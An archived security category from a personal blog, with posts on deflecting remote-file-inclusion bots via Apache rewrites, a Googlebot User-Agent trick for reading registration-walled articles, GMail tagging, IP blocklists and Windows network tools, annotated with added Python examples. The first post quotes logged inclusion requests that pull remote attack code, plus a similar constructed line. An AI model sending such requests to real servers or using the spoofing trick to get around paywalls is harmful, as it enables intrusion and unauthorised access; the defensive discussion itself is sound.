Archive for category Information Security

How to frustrate a trojan bot script

While doing some regular maintenance on some websites I manage, I came across some interesting entries in the logs for one of our servers: hundreds and hundreds of requests of the following type, originating from a wide variety of IPs:

GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt? 

Basically, a bunch of 'infected' web servers out there are trying to get our server to fetch and execute code stored in a file on a remote server (a remote file inclusion attempt, which only works if the targeted script will include whatever URL it is handed in the 'op' parameter). The file in the cases above is named 'cs.txt'. You can see the contents of the script by reading Dan Langille's sanitized version of the attack script.

While our server was not vulnerable to the attack, I was getting very annoyed at having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce the error page a normal user would see explaining why the request could not be completed, and so on. Then it hit me: why are we spending all this precious CPU time on these attackers? Why not have them waste their own CPU time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request back to the originating server. It's like requesting a web page from a server, being told that the page has moved, and being given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's the loopback address, a network standard that always points at the machine making the request.

Here's what I put in httpd.conf, the Apache web server's configuration file, on the Linux server I wanted to modify:

# mod_rewrite must be loaded for these directives to take effect
RewriteEngine on
# Match a query string containing the literal text "cs.txt?" (NC = case-insensitive).
# The dot and question mark are escaped: unescaped, "cs.txt?" is a regular expression
# in which "." matches any character and "?" makes the last "t" optional, so it would
# also match unrelated strings such as "cs-tx".
RewriteCond %{QUERY_STRING} cs\.txt\? [NC]
# Permanently redirect the requester to its own loopback address and stop rewriting.
RewriteRule ^.*$ http://127.0.0.1 [R=301,L]

So now, whenever a request comes in whose query string contains 'cs.txt?', I inform the requester that the file it is asking for has been permanently moved to http://127.0.0.1, the loopback address, which is to say, itself. One caveat: this only costs the attacker anything if its script follows redirects. A bot that ignores the Location header simply moves on to its next target, and from our server's point of view a 301 generated by mod_rewrite is about as cheap as a 403 returned with the [F] flag, which refuses the request without any redirect at all.

While the hits on the server continue, I have noticed that they have slowed down; I'm assuming that's because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time on these trojan hits, and is letting them talk to themselves for a bit instead.
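As an added example (not part of the original post, and not Dan Langille's script), here is a small Python triage script that does the detection step described above over constructed log lines: it pulls the query string out of each request, flags any parameter whose value is an absolute URL as a remote file inclusion attempt, and tallies attempts by source IP and by the host serving the payload. It also shows why the RewriteCond pattern needs its dot and question mark escaped. The log lines, source IPs and timestamps are constructed; only the two h18.ru request paths mirror the ones quoted above.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not from the original post's logs).
# The two h18.ru entries mirror the request shape quoted above; the rest is filler traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2005:10:01:02 -0500] "GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.0" 404 312 "-" "Mozilla/4.0"
10.0.0.6 - - [12/Mar/2005:10:01:07 -0500] "GET /modules.php?op=http://amyru.h18.ru/images/cs.txt? HTTP/1.0" 404 312 "-" "Mozilla/4.0"
10.0.0.5 - - [12/Mar/2005:10:02:11 -0500] "GET /modules.php?op=modload&name=News&file=index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2005:10:03:40 -0500] "GET /index.php?page=http://203.0.113.9/x.txt? HTTP/1.0" 404 312 "-" "libwww-perl/5.79"
10.0.0.8 - - [12/Mar/2005:10:04:00 -0500] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A parameter value that is itself an absolute URL is the signature of a
# remote file inclusion attempt, whichever script it is aimed at.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_payloads(target):
    """Return (parameter, url) pairs whose value is a remote URL."""
    query = urlsplit(target).query
    hits = []
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if REMOTE_URL_RE.match(value):
                hits.append((param, value))
    return hits


def summarize(log_text):
    """Count inclusion attempts per source IP and per host serving the payload."""
    by_ip, by_payload_host = Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for _param, url in rfi_payloads(rec["target"]):
            by_ip[rec["ip"]] += 1
            by_payload_host[urlsplit(url).hostname] += 1
    return by_ip, by_payload_host


# The RewriteCond pattern is a regular expression: in "cs.txt?" the dot matches any
# character and the "?" makes the final "t" optional, so it also matches "cs-tx".
def matches_loose(query_string):
    return re.search(r'cs.txt?', query_string, re.IGNORECASE) is not None


def matches_strict(query_string):
    """Escaped form: matches the literal text cs.txt? and nothing else."""
    return re.search(r'cs\.txt\?', query_string, re.IGNORECASE) is not None


if __name__ == "__main__":
    ips, hosts = summarize(SAMPLE_LOG)
    print("attempts by source:", dict(ips))
    print("attempts by payload host:", dict(hosts))
    print("loose pattern hits 'op=docs-txt':", matches_loose("op=docs-txt"))
    print("strict pattern hits 'op=docs-txt':", matches_strict("op=docs-txt"))
```

Run it directly to print the tallies; the summarize() output is what you would feed into a block list or an alert, and the two matches_* functions are the unescaped and escaped RewriteCond patterns side by side.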

No Comments

Need to rebuild your computer? Have all your keys?

I was chatting with a friend this morning when he mentioned to me that he spent part of his weekend rebuilding one of his home computers. He indicated that he was reluctant to do some of the cleanup work because he wasn’t sure where he had packed all his legally purchased software keys; he moved to a new home a couple of weeks ago and has boxes scattered all over the place. I immediately brought up a little tool I have used in the past that has more than once gotten me out of such a bind. Take a look at the Magical Jelly Bean Keyfinder. Make sure you pick up the Beta version, since the stable version is a little outdated and will not detect keys for Office 2003.

1 Comment

Access Websites Without Registering

Ever run a search on Google for some information you were interested in, only to find that after you click on a result you are taken to a site which requires registration in order to access the full article? I sure have, on many occasions. Ever wonder how Google was able to index something that can only be accessed by registered users? That thought occurred to me on my ride home today as I was listening to some podcasts. I do some of my best thinking while driving and listening to something totally unrelated to the problem I’m trying to solve. And that’s when it struck me…

There’s no way that the Google bot happened to have ‘registered’ an account on some of these sites and thus had access. Even if it did, the bot just follows links, albeit in an intelligent manner. So, it had to be something else. And that’s when it hit me: the Google bot identifies itself with a unique ‘User Agent’ string. When one of these sites sees that Google is spidering their pages, they just give it free rein over all their content. After all, it’s important to them to get as much of their content indexed as possible, and thereby get more people directed to their website from search results. When you and I go to the same site, our browser transmits a User Agent header indicating whether we’re using Firefox or IE or another browser, and since the browser sets that header, so can we.

I decided to test my theory tonight. I fired up my Firefox browser and grabbed an extension which would enable me to customize my User Agent value. I downloaded the “User Agent Switcher” Firefox extension, set my User Agent to “GoogleBot/2.1” (no quotes) and I was ready to go. I needed to find a site that was indexed by Google but that required ‘registration’ to view its content. Take the following URL for example: http://www.windowsitpro.com/Windows/Article/ArticleID/46980/
Try going to it without modifying your User Agent and you’ll notice you need to be a subscriber to see more than two paragraphs of the full article. Now modify your User Agent and presto! You have access to the full article!

While this won’t work with some of the larger sites like the New York Times or Washington Post, it does work with some of the smaller sites which rely more heavily on Google to route some traffic to their site. For now, anytime I hit a site which requires me to register before I can view the full article, I’ll switch my User Agent just in case. I have a strange suspicion this might work on many, many sites…
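The server-side logic the post infers, as an added example in Python (not code from the original post or from any of the sites mentioned): ua_only_check is the weak check that makes the User Agent Switcher trick work, and verified_googlebot is what a site that actually wanted to admit only Google's crawler would do, following Google's published advice to confirm that the client IP's reverse DNS name ends in googlebot.com or google.com and that the name resolves back to the same IP. The DNS data, IPs and article text are constructed so the example runs offline; dns_reverse and dns_forward are the real resolvers you would pass in production.

```python
import socket

# Domains Google documents for its crawler's reverse DNS names.
GOOGLEBOT_DOMAINS = ("googlebot.com", "google.com")


def ua_only_check(headers):
    """Weak check: trusts the User-Agent header, which any client can set."""
    return headers.get("User-Agent", "").lower().startswith("googlebot")


def verified_googlebot(remote_ip, headers, reverse_lookup, forward_lookup):
    """Accept the crawler claim only if the client IP's PTR record is in a Google
    crawler domain and that name resolves back to the same IP."""
    if not ua_only_check(headers):
        return False
    try:
        host = reverse_lookup(remote_ip).rstrip(".").lower()
        if not any(host == d or host.endswith("." + d) for d in GOOGLEBOT_DOMAINS):
            return False
        return remote_ip in forward_lookup(host)
    except OSError:  # no PTR / no A record: treat as not verified
        return False


def dns_reverse(ip):
    """Real resolver: PTR lookup (needs network access)."""
    return socket.gethostbyaddr(ip)[0]


def dns_forward(host):
    """Real resolver: every address the name resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def serve_article(full_text, remote_ip, headers, is_subscriber=False,
                  reverse_lookup=dns_reverse, forward_lookup=dns_forward):
    """Subscribers and verified crawlers get the whole article; everyone else a teaser."""
    if is_subscriber or verified_googlebot(remote_ip, headers, reverse_lookup, forward_lookup):
        return full_text
    paragraphs = full_text.split("\n\n")
    return "\n\n".join(paragraphs[:2]) + "\n\n[Subscribe to read the rest of this article]"


# Constructed DNS data standing in for real lookups, so the example runs offline.
FAKE_PTR = {
    "203.0.113.10": "crawl-203-0-113-10.googlebot.com",  # genuine crawler
    "198.51.100.7": "host7.attacker.example",             # PTR not in a Google domain
    "198.51.100.8": "fake.googlebot.com",                 # forged PTR; forward DNS disagrees
}
FAKE_A = {
    "crawl-203-0-113-10.googlebot.com": {"203.0.113.10"},
    "host7.attacker.example": {"198.51.100.7"},
    "fake.googlebot.com": {"203.0.113.10"},
}


def fake_reverse(ip):
    if ip not in FAKE_PTR:
        raise OSError("no PTR record")
    return FAKE_PTR[ip]


def fake_forward(host):
    if host not in FAKE_A:
        raise OSError("no A record")
    return FAKE_A[host]


CRAWLER_HEADERS = {"User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)"}
BROWSER_HEADERS = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/1.0"}
ARTICLE = "Para one.\n\nPara two.\n\nPara three.\n\nPara four."  # constructed

if __name__ == "__main__":
    for ip in FAKE_PTR:
        print(ip, "UA-only:", ua_only_check(CRAWLER_HEADERS),
              "verified:", verified_googlebot(ip, CRAWLER_HEADERS, fake_reverse, fake_forward))
```

A site that verifies the crawler this way is not fooled by a changed User-Agent, which is one reason the trick fails on some sites and works on others. The forged-PTR case (198.51.100.8) is why the forward lookup matters: anyone who controls the reverse zone for their own addresses can name them whatever they like.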

1 Comment

More Fun With GMail

My friend Dan approached me at work today relating a story he had read on someone’s blog regarding some interesting GMail tips. The one he brought up was how you could take your GMail address and ‘append’ additional words to the account name. For example, if you had a GMail account of ‘nasal43087@gmail.com’, you could give out an email address of ‘nasal43087+amazon@gmail.com’ when buying something from Amazon. Now, if Amazon emailed you, you would get the email like you normally would. You could filter on the appended ‘+amazon’ to automatically move the email into a folder, but more importantly, if you were to receive an email at that ‘address’ from anyone else, you would instantly know that Amazon had given or sold your address, and to whom. This would be a quick way to determine who is selling your information off to spammers…

The GMail Tips website also has lots of other interesting tips/ideas to try out with your GMail account. The tip above was taken from their GMail Tip #5.
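As an added example (not from the original post or from GMail Tips), this Python snippet automates the tip above: it splits a plus-addressed recipient into base, tag and domain, files mail whose sender matches the party the tag was given to, and flags mail that arrives at a tag from anyone else as evidence the address was shared. The tag-to-owner table, the mailbox and every address in it are constructed.

```python
from email.utils import parseaddr

# Which tag was handed to whom. Constructed for this example; in practice you
# record the tag each time you give the address out.
TAGS_GIVEN_TO = {
    "amazon": "amazon.com",
    "newsletter": "example.net",
}


def split_tagged(address):
    """'Name <user+tag@gmail.com>' -> ('user', 'tag', 'gmail.com'); tag is '' if absent."""
    _name, addr = parseaddr(address)
    local, _, domain = addr.rpartition("@")
    base, _, tag = local.partition("+")
    return base, tag.lower(), domain.lower()


def sender_domain(from_header):
    return parseaddr(from_header)[1].rpartition("@")[2].lower()


def triage(message, tags=TAGS_GIVEN_TO):
    """Return (disposition, tag) for a message given as a dict of headers.

    'filed'   -> tagged address used by the party it was given to: file it
    'leaked'  -> tagged address used by someone else: that party shared your address
    'unknown' -> a tag you never handed out (someone guessing plus-addresses)
    'inbox'   -> untagged mail
    """
    _base, tag, _domain = split_tagged(message.get("To", ""))
    if not tag:
        return "inbox", ""
    owner = tags.get(tag)
    if owner is None:
        return "unknown", tag
    sender = sender_domain(message.get("From", ""))
    if sender == owner or sender.endswith("." + owner):
        return "filed", tag
    return "leaked", tag


def leaked_tags(mailbox, tags=TAGS_GIVEN_TO):
    """(tag, party it was given to) pairs that have been used by a third party."""
    leaks = set()
    for message in mailbox:
        disposition, tag = triage(message, tags)
        if disposition == "leaked":
            leaks.add((tag, tags[tag]))
    return sorted(leaks)


# Constructed sample mailbox: headers only, which is all the check needs.
SAMPLE_MAILBOX = [
    {"From": "order-update@amazon.com", "To": "nasal43087+amazon@gmail.com", "Subject": "Your order has shipped"},
    {"From": "deals@cheap-pills.example", "To": "nasal43087+amazon@gmail.com", "Subject": "Special offer"},
    {"From": "editor@example.net", "To": "Me <nasal43087+newsletter@gmail.com>", "Subject": "Issue 12"},
    {"From": "friend@example.org", "To": "nasal43087@gmail.com", "Subject": "lunch?"},
    {"From": "spam@example.com", "To": "nasal43087+ebay@gmail.com", "Subject": "hi"},
]

if __name__ == "__main__":
    for message in SAMPLE_MAILBOX:
        print(triage(message), "<-", message["From"], "to", message["To"])
    print("leaked by:", leaked_tags(SAMPLE_MAILBOX))
```

The 'leaked' result is exactly the signal the post describes. Two caveats a practitioner would add: the check keys on the sender domain, which can be forged, so treat a hit as a lead rather than proof; and anyone reselling a list can strip everything after the '+' before using it, so this catches the careless rather than the determined.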

No Comments

Wireless Security and Hacking, Redux


I was recently given the book Wi-Foo, The Secrets of Wireless Hacking as a present for my birthday, and I have been reading it extensively for the past few days. I have been involved with wireless security for a few years now, giving security talks to members of my community and helping friends and family stay secure while enjoying the wonderful advantages of wireless computing. Over the past couple of years, I have slowly built up a small reference library of books related to wireless technologies and security. I even got involved in a small antenna-building hobby, which enabled me to better understand some of the ways RF works.
Upon reading the first few chapters of this book, I realized that this tome was different. The information contained within its pages wasn’t a re-hashed compendium of information that could be gathered across the internet and spoon-fed to the reader. In this case, the authors walk the reader through the many vulnerabilities of wireless computing, how those vulnerabilities are exploited by nefarious individuals, and the ever-expanding variety of tools available to assist in exploiting them.
Don’t get the wrong idea here; this isn’t the run-of-the-mill how-to put together from various information sources freely available on the internet. The authors take painstaking efforts to explain how the various wireless encryption/security options, such as WEP, WPA, LEAP, TKIP, PSK, etc., work, and how they can be defeated. The tools are not only defined, but described in relation to how they leverage and exploit the vulnerabilities, and why they work.
As you can imagine, I’m definitely going to be reading this book from cover to cover. The information within is fresh and very comprehensive. While extensive in its depth, I still believe that this is an ideal book for anyone, from beginner to expert, who has a desire to better understand wireless computing technologies, their advantages and disadvantages, and how to protect oneself from evil-doers out to take advantage of the stealth that wireless provides.

No Comments

Blocking out IP’s from China

Sick and tired of getting spam and ‘open web proxy’ probes from IPs originating in China? Do you do absolutely no business with anyone in China? Want to block all IPs originating in China and rid yourself of this issue? Take a look at http://www.okean.com/asianspamblocks.html
I actually made use of their lists in order to block some large subnet blocks which were sucking up about 10-15% of my total bandwidth just through their incessant probes of my network.
And before anyone starts crying about how sad it is that I’m ‘censoring’ people from China, well, too bad. I can’t afford to keep paying for an internet connection that is slowly being used up by probes originating from servers whose owners can’t keep up with security patches. Not to mention the crazy amounts of spam originating from these IPs…
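An added example (not the okean.com list and not the author's configuration) of what you do with such a list once you have it, in Python: parse a one-CIDR-per-line block list, merge adjacent ranges, test addresses against it, render plain iptables DROP rules, and measure what share of logged response bytes went to sources the list would have dropped, which is the 10-15% figure above computed from a log instead of estimated. All ranges, addresses and log lines are constructed from documentation address space.

```python
import ipaddress

# Constructed sample block list (not okean.com's real list) in the one-CIDR-per-line
# form such lists are usually published in; comments and blank lines are allowed.
SAMPLE_BLOCKLIST = """\
# constructed example ranges
203.0.113.0/24
198.51.100.0/25
198.51.100.128/25   # adjacent to the /25 above; collapses into one /24
192.0.2.77          # a bare address is treated as a /32
"""

# Constructed access-log lines; only the source IP and the response size are used.
SAMPLE_LOG = [
    '203.0.113.45 - - [01/Jun/2005:08:00:01 -0500] "GET / HTTP/1.0" 200 4500 "-" "Mozilla/4.0"',
    '198.51.100.130 - - [01/Jun/2005:08:00:02 -0500] "CONNECT mail.example:25 HTTP/1.0" 403 300 "-" "-"',
    '192.0.2.5 - - [01/Jun/2005:08:00:03 -0500] "GET /index.html HTTP/1.1" 200 5200 "-" "Mozilla/5.0"',
]


def load_blocklist(text):
    """Parse CIDR lines into networks and merge adjacent or overlapping ranges."""
    nets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return list(ipaddress.collapse_addresses(nets))


def is_blocked(ip, nets):
    """True if ip falls inside any network in nets."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def iptables_rules(nets, chain="INPUT"):
    """Render one DROP rule per merged network for a plain iptables setup."""
    return [f"iptables -A {chain} -s {net.with_prefixlen} -j DROP" for net in nets]


def blocked_byte_share(log_lines, nets):
    """Fraction of logged response bytes that went to sources the list would drop."""
    total = blocked = 0
    for line in log_lines:
        ip = line.split(" ", 1)[0]
        status_and_bytes = line.split('"')[2].split()  # the ' 200 4500 ' part
        size = int(status_and_bytes[1]) if status_and_bytes[1].isdigit() else 0
        total += size
        if is_blocked(ip, nets):
            blocked += size
    return blocked / total if total else 0.0


if __name__ == "__main__":
    nets = load_blocklist(SAMPLE_BLOCKLIST)
    print("merged networks:", [str(n) for n in nets])
    print("\n".join(iptables_rules(nets)))
    print("share of bytes to blocked sources: %.0f%%" % (100 * blocked_byte_share(SAMPLE_LOG, nets)))
```

With lists of thousands of entries, an ipset (or an nftables set) matched by a single rule is far cheaper than one iptables rule per network; the rendered rules here are for a small, hand-maintained list. Measuring the byte share before and after you apply a list is also the honest way to decide whether a country-wide block is worth the collateral damage, since such lists go stale and probes from compromised hosts elsewhere are untouched by them.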

No Comments

What will I do without SamSpade.Org?

Many times a week, sometimes many times a day, I rely on being able to do some quick informational lookups on one or more IPs, be it trying to find out who owns a particular server or which hop between me and the box is causing my connection issues. Over the years, I have relied heavily on http://www.samspade.org for all my IP-related tools. It’s a great site, with all the tools I need to get the information I’m looking for. The added benefit is that it’s not on my network, so the results give me an external view of the issue, as well as providing some level of anonymity.

SamSpade has been overloaded recently; I’m not sure what’s going on, but during some periods the site is barely accessible. This has led me to look at some alternatives for those times when Sam is down. That’s when I came across http://www.geektools.com

At first glance, it doesn’t look like much, but they do provide two of the tools I use the most: WHOIS and traceroute. But here’s where things are different. You are given the choice of running your traceroute from over a hundred sites scattered across the globe. This is great for seeing whether an issue is the result of a down box somewhere or a bad router, rather than something on your own path.

While SamSpade still has a few extra nice tools (such as the anonymous URL browser and URL decrypter), Geektools adds that extra level of accessibility for those times when Sam isn’t available…

5 Comments

Cool Windows XP Internal System Tools

While doing some troubleshooting on my Windows XP workstation at home, I needed to determine what network connections my computer was currently using and what processes were attached to them. Sure, I could run ‘netstat’, but by default that only tells me what connections I have; if I spot anything out of the ordinary, it doesn’t tell me which process is using that connection. (On XP, ‘netstat -ano’ will at least print the owning PID, which ‘tasklist’ can turn into a process name, but that is two commands and a lookup for every line.) That’s when I hit Google and found this gem of a site, http://www.sysinternals.com/ntw2k/utilities.shtml

The utility I actually needed was called TCPView, but the owner of this site has authored a slew of other very cool utilities, much like the ones I use every day in a Linux environment.

Utilities like:

  • Handle – This handy command-line utility will show you what files are open by which processes, and much more.
  • RegMon – This monitoring tool lets you see all Registry activity in real-time. It works on all versions of WinNT/2K, Windows 9x/Me and Windows 64-bit.
  • Process Explorer – Find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. This uniquely powerful utility will even show you who owns each process.
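As an added example (not from Sysinternals or the original post), here is the same connection-to-process mapping that TCPView gives you, done by hand in Python from the two built-in commands XP does have: parse ‘netstat -ano’, which prints the owning PID, join it with ‘tasklist /fo csv’ to get the image name, and list established connections held by processes you did not expect. The command output, PIDs, addresses, process names and the allowlist are all constructed.

```python
import csv
import io

# Constructed output of 'netstat -ano' (added example; not captured from a real box).
# PID 3104 and the process behind it are invented to give the check something to find.
NETSTAT_ANO = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.10:1045      203.0.113.5:80         ESTABLISHED     2288
  TCP    192.168.1.10:1052      198.51.100.7:6667      ESTABLISHED     3104
  UDP    0.0.0.0:500            *:*                                    700
"""

# Constructed output of 'tasklist /fo csv'.
TASKLIST_CSV = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Console","0","236 K"
"lsass.exe","700","Console","0","1,500 K"
"svchost.exe","912","Console","0","4,120 K"
"firefox.exe","2288","Console","0","48,000 K"
"winupd.exe","3104","Console","0","2,300 K"
"""


def parse_netstat(text):
    """Turn netstat -ano output into dicts; UDP rows have no State column."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue  # banner, header and blank lines
        if fields[0] == "TCP":
            proto, local, foreign, state, pid = fields
        else:
            proto, local, foreign, pid = fields
            state = ""
        rows.append({"proto": proto, "local": local, "foreign": foreign,
                     "state": state, "pid": int(pid)})
    return rows


def parse_tasklist(text):
    """Map PID -> image name from tasklist /fo csv output."""
    reader = csv.DictReader(io.StringIO(text))
    return {int(row["PID"]): row["Image Name"] for row in reader}


def connections_with_process(netstat_text, tasklist_text):
    """netstat rows with the owning process name joined in by PID."""
    procs = parse_tasklist(tasklist_text)
    rows = parse_netstat(netstat_text)
    for row in rows:
        row["process"] = procs.get(row["pid"], "<unknown>")
    return rows


# Processes you expect to hold outbound connections on this workstation (constructed allowlist).
EXPECTED_OUTBOUND = {"firefox.exe"}


def unexpected_outbound(netstat_text, tasklist_text, allowed=EXPECTED_OUTBOUND):
    """Established TCP connections owned by processes outside the allowlist."""
    return [(row["process"], row["foreign"])
            for row in connections_with_process(netstat_text, tasklist_text)
            if row["proto"] == "TCP" and row["state"] == "ESTABLISHED"
            and row["process"] not in allowed]


if __name__ == "__main__":
    for row in connections_with_process(NETSTAT_ANO, TASKLIST_CSV):
        print(f'{row["proto"]:4} {row["local"]:22} {row["foreign"]:22} {row["state"]:12} {row["pid"]:>5} {row["process"]}')
    print("unexpected:", unexpected_outbound(NETSTAT_ANO, TASKLIST_CSV))
```

On a real box you would pipe the two commands into this instead of the constructed strings; the join is what TCPView does live, and the allowlist is the part you have to supply from knowing what should be running.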

No Comments